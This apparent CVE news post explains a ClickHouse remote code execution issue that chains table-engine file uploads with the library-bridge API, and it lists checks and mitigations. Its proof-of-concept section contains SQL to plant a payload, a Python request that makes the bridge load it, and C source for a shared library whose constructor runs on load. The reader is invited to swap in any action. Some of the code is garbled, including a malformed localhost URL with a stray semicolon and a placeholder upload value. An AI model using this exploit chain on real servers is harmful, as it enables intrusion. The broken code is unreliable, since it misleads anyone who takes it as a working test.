CVE CyberSecurity Database News

CVE-2025-1385 - ClickHouse library-bridge RCE – How Local API & Table Engine Lead to Arbitrary Code Execution

Poster -

ClickHouse is a widely used high-performance columnar database, popular for analytics and big data workloads. But with great power comes great responsibility — and sometimes, serious vulnerabilities. In this post, we break down CVE-2025-1385, an issue where the combination of two legit ClickHouse features lets attackers run arbitrary code on your server, all by design.

Let’s see how it works, how you can test if you’re vulnerable, and some simple steps to keep your data safe.

ClickHouse has two handy features

1. Library Bridge (clickhouse-library-bridge): This is a helper that lets ClickHouse dynamically load code from libraries and run it in complete isolation. Communication with clickhouse-library-bridge is done over an HTTP API, usually listening on localhost at port 9019.
2. Table Engines with File Upload: Some table engines (for example, File, S3, or external table engines) support uploading files directly to specified server directories.

If you configure both these features carelessly, and an attacker can access both, they can upload *evil* code as a shared library and trick ClickHouse into running it—giving them code execution (RCE) as the ClickHouse user!

Here's the classic attack flow

1. File Upload: The attacker uploads a malicious shared library (a .so file) to a directory on the ClickHouse server that the 'server' user can access, using a table engine that allows file uploads.
2. Library-Bridge Call: The attacker connects (even though it’s localhost, this can be abused by an attacker with SQL access via SSRF or local port forwarding) to the library-bridge API and asks it to load the malicious library.
3. Code Execution: The library is loaded by the isolated clickhouse-library-bridge process, which executes the attacker's code.

Key point: The attacker needs ClickHouse SQL or file upload privileges (not just any random user), and one of the vulnerable configurations enabled.

Am I Vulnerable? Check Your Config!

Open your ClickHouse server config file (usually config.xml).

Look for these lines

<library_bridge>
    <port>9019</port>
</library_bridge>

If this block is *not* commented out and the service is running, your server is exposing the library bridge on localhost:9019. If you've enabled file uploads (often with certain Table Engines), you have doubled your risk.

Check for file engine uploads

Look for configs referencing file or external Table Engines. Make sure only trusted users can upload files or use these engines.

Proof-of-Concept Exploit

> ⚠️ For educational purposes only. Don’t run this on production.

Step 1: Upload a payload

Suppose you have SQL access on the ClickHouse server and you can upload files. First, compile your malicious .so payload (see [Sample Malicious .so](#sample-malicious-so-file)).

Upload it to a directory the Library Bridge can access (e.g., /var/lib/clickhouse/user_files/).

-- This assumes File Table Engine is enabled and user_files is writable
CREATE TABLE upload_payload (data String) ENGINE = File('payload.so');
INSERT INTO upload_payload VALUES (file_binary_data);

*(Replace file_binary_data with actual hex-encoded bytes from your .so, or use a supported file upload method.)*

Step 2: Trigger the load

Launch a local HTTP request to the Library Bridge.

import requests

# Path to .so is absolute or relative to ClickHouse server's working directory
data = {'library_path': '/var/lib/clickhouse/user_files/payload.so'}
r = requests.post('http://127...1:9019/v1/load_library';, json=data)
print(r.text)

If the server is vulnerable and all needed privileges are in place, payload.so gets loaded and executed!


Sample Malicious .so File

Here’s a minimal (Linux x86_64) shared library that writes to a file when loaded—replace the action as needed.

#include <stdio.h>
#include <stdlib.h>

__attribute__((constructor))
void run_on_load() {
    FILE *f = fopen("/tmp/pwned.txt", "w");
    if (f) {
        fprintf(f, "CVE-2025-1385 exploit!\n");
        fclose(f);
    }
}

Compile it

gcc -fPIC -shared -o payload.so payload.c

References & Further Reading

- Official CVE entry (CVE-2025-1385) *(pending publication)*
- ClickHouse Documentation: library-bridge
- Security Advisory: Arbitrary code execution via library-bridge and file Table Engine
- ClickHouse Table Engine documentation

How to Protect Your Server

1. Disable library-bridge unless you need it: Remove or comment out the <library_bridge> block in your config file.
2. Restrict upload capabilities: Only allow trusted users to use file/external engines and upload files.
3. Update ClickHouse: Keep your installations up-to-date; the bug is likely patched in the latest releases.

Conclusion

CVE-2025-1385 highlights how “nice-to-have” integrations can become nightmares without proper security controls. Always separate privileges, monitor configs, and limit what users can do just in case those features turn into backdoors.

Timeline

Published on: 03/20/2025 08:15:11 UTC